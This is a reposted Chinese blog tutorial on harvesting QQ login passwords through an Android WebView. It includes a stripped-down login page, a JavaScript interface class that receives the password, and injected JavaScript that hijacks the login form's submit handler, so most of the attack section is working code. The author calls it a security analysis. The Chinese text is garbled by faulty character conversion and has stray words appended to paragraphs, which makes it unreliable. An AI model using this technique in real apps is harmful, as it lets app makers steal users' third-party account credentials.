WebView Attack In Android : 解析第三方帐号登陆平台所存在的安全隐患

时间 2019-11-17

标签 webview attack android 解析第三方帐号登陆平台所存在的安全隐患栏目 Android 繁體版

原文原文链接

转载请注明出处：http://blog.csdn.net/singwhatiwanna/article/details/17663345

前言

这是一个颇有趣的话题，WebView在Android中包括IOS中都是一个很重要的控件，有了它，咱们能够直接在应用里打开网页而不用跳到浏览器，且网页效果和浏览器几乎同样，这样会加强用户体验，固然也有缺点：占用内存太大，由于WebView加载网页所耗费的内存所有算在你的应用的堆里，若是不作特殊处理，你的应用就更容易OOM了。可是这不是咱们今天所讨论的话题，我今天要介绍的是：若是利用WebView强大的特性来作一些有意义的事，好比违规存储第三方登陆平台的帐号信息（好比QQ登陆平台、新浪微博等），为何说是违规存储，由于第三方登陆平台确定不肯意将本身的帐号信息给你，尤为是帐户密码，由于这涉及到帐户安全。固然，本次分析只讨论技术可行性，不讨论实际可行性，确切来讲，完成这一切要有一个前提：你的应用接入了第三方登陆平台（这个很常见）而且你有权利经过你的应用去收集帐号信息（这个很难，可是你作个山寨应用是能够作到的）。另外，因为本文重点不是介绍如何使用WebView，因此基础知识请你们自行了解下。还有，博主写本文只是和你们分析技术，同时指出问题，并非鼓励你们去搞破坏。javascript

WebView重要的特性

WebView支持JavaScript，通常的应用为了得到正常的体验效果，每每还会设置WebViewClient（页面加载进度相关接口）和WebChromeClient（网页弹出对话框相关接口等），总之，经过合理的设置，一个WebView基本能够作到和浏览器访问页面同样的效果
WebView支持在Android代码中执行JavaScript语句：mWebView.loadUrl("javascript:" + mJsString)
WebView支持在JavaScript中执行Android语句（这个特性Google官方的解释是：使用的时候尤为要注意安全性）：mWebView.addJavascriptInterface(new SavePasswordJavaScriptInterface(), "SPJSInterface")

好了，有了上面几个特性，咱们就能够进入正题了html

第三方帐号登陆平台所存在的安全隐患

这里以QQ帐号接入平台为例，下面将会演示一个如何违规存储第三方帐号信息的方法，因为除了Android还涉及到JavaScript、HTML等东西，因此具体的实现上可能会有细微差异（由于HTML和JavaScript会改变），可是思想是不变的。前端

下面是一段QQ接入平台的登陆页面的HTML代码，我进行了删减，大致以下所示：java

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="application/xhtml+xml; charset=UTF-8" />
<meta name="viewport" content="width=device-width; initial-scale=1.0; minimum-scale=1.0; maximum-scale=1.0"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge"/>
<meta content="telephone=no" name="format-detection">
<meta http-equiv="Expires" content="0"/>
<meta http-equiv="Pragma" content="no-cache"/>
<meta http-equiv="Cache-Control" content="no-cache,no-store,max-age=0,s-maxage=0,must-revalidate" />
    <title>账号设置</title>
</head>
<body class="unilogin" style="height:100%">
    <div id="ptlogin-container">
        <h1 id="title">账号设置</h1>
        <!--  普通登陆 -->
        <!--注意：咱们只要在这里执行咱们的代码就能够了，由于登陆的时候表单提交会执行onsubmit
        或者就算HTML不是这么写的，也不要紧，咱们的本意是当表单提交的时候能执行咱们的代码就好了
        咱们只要在Android中执行一段js，经过js给表单的onsubmit事件加入咱们的代码，估计难不倒各位
        -->
        <form onsubmit="return false;">
            <fieldset id="loginBox" class="loginfiled" style="display:none">
                <p>
                    <lable class="input-title">账 号</lable>

                        <input type="tel" id="ptlogin-name" placeholder="请输入QQ号"/>
                        <a class="empty" id="clearQQ" style="display:none;">清除</a>
                </p>
                <p>
                    <lable class="input-title">密 码</lable>
                    <input type="password" id="ptlogin-password" placeholder="请输入密码">
                    <a class="empty" id="clearPwd" style="display:none;">清除</a>
                </p>
            </fieldset>
            <div class="varify-wrapper clearfix" id="verify_box" style="display:none">
                <div class="show-varify fr clearfix">
                    <div class="img-varify fl">
                        <img id="verifyPic" src="http://3gimg.qq.com/wap30/img/netdisk/verification-code.png" width="110" height="38"></div>
                        <div class="fl"><a id="reVerify" href="#">换一张</a></div>
                    </div>
                <div class="fl"><input id="ptlogin-imgVerify" type="text" placeholder="输入验证码"></div>
            </div>
            <input id="isNeedSid" type="hidden" name="isNeedSid" value=1 />
                <input id="bid" type="hidden" name="bid" value=flashgame />
                <p><input id="ptlogin-submit" class="btn-login" type="submit" value="登 录" style="display:none"></p>
        </form>
    </div>
    <!--没法登陆-->
    <div class="common-box box-sm" id="ptlogin-prompt-1" style="display: none">
        <h3 class="bd-bm-bk" id="login-errmsg">登陆过于频繁，请稍后再试</h3>
        <div class="btn-md">
            <input id="ptlogin-relog-1" class="btn-dialog btn-cancel" type="reset" value="肯定">
        </div>
    </div>
    <!--出错提示-->
    <div class="common-box box-error" id="ptlogin-prompt-2" style="display:none;">
        <h3 class="bd-bm-bk" id="login-errmsg">登陆密码错误，请从新输入</h3>
        <div class="btn-md">
            <input id="forget-pwd-1" class="btn-dialog" type="button" value="忘记密码">
            <input id="ptlogin-relog-2" class="btn-dialog" type="reset" value="从新输入">
        </div>
    </div>
    <!--正在登陆-->
    <div class="load-box" style="display:none;">
        <div class="load-circle"></div>
        <p>登陆中...</p>
    </div>
</body>
</html>

实现思想：

首先向WebView注入Java对象，在WebView加载完毕的时候执行一段js，给表单提交事件关联上咱们的代码，即让表单提交的时候执行所注入的Java对象的一个方法，js执行咱们的方法的时候能够把qq号和密码做为参数传递过来，而后咱们就能够保存了。下面的步骤只示范如何把qq密码存下来，不过，存qq号是同样的方法，多传递一个参数就好了。浏览器

实现步骤：

第一步：声明要注入的Java对象

public class SavePasswordJavaScriptInterface  
{  
	public void savePassword(final String password)
	{  
		Log.w("ATTACK", "enter spjsinterface:"+ password);

		mHandler.post(new Runnable()
		{  
			@Override  
			public void run()
			{
    			//这里就是用户登陆的密码了，你能够存起来了
    			mPassword = password;
    			Log.w("ATTACK", mPassword);
			}  
		});  
	} 
}

第二步：注入上述对象

//这里是注入Java对象
mWebView.addJavascriptInterface(new SavePasswordJavaScriptInterface(), "SPJSInterface");
//这里是打开登陆平台页面
mWebView.loadUrl(LOGIN_URL);

第三步：在WebViewClient中的onPageFinished方法中注入js，这样当登陆的时候就会调用咱们以前注入的Java对象，同时乖乖地把密码做为参数传过来

@Override
public void onPageFinished(WebView view, String url)
{
    super.onPageFinished(view, url);
	//仅当是登陆url的时候才注入咱们的js，不要任何url都注入
	if (url.equals(LOGIN_URL)) {
		//要注入的js
		String js = "document.forms[0].onsubmit=function(event){var pwd = document.getElementById(\"ptlogin-password\").value;window.SPJSInterface.savePassword(pwd);return false;}";
		Log.w("ATTACK", "inject js, js= " + js);
		view.loadUrl("javascript:" + js);
	}
}

总结一下

从上面三个步骤，咱们就能够获取第三方接入平台的帐号信息了。这里我再简述一下思想：首先注入java对象，当登陆页面加载完成之后，再注入一段js，让登陆表单在提交的时候可以执行咱们以前注入的java对象的方法，而后就好了，等用户输入帐号信息点击登陆的时候，咱们的方法就会被调用，而方法的参数就是帐号信息。不一样的接入平台注入对的js应该是不同的，可是这个我相信绝对难不倒你们。不知道会不会有些朋友以为很差理解，主要是由于用到了java和js的交互，涉及到html中表单的提交和js中的事件，这些知识是属于前端开发范畴的，因此我没有去详细地介绍它，感兴趣的小伙伴们能够本身了解下html和js。最后，新的一年里，祝你们新年快乐！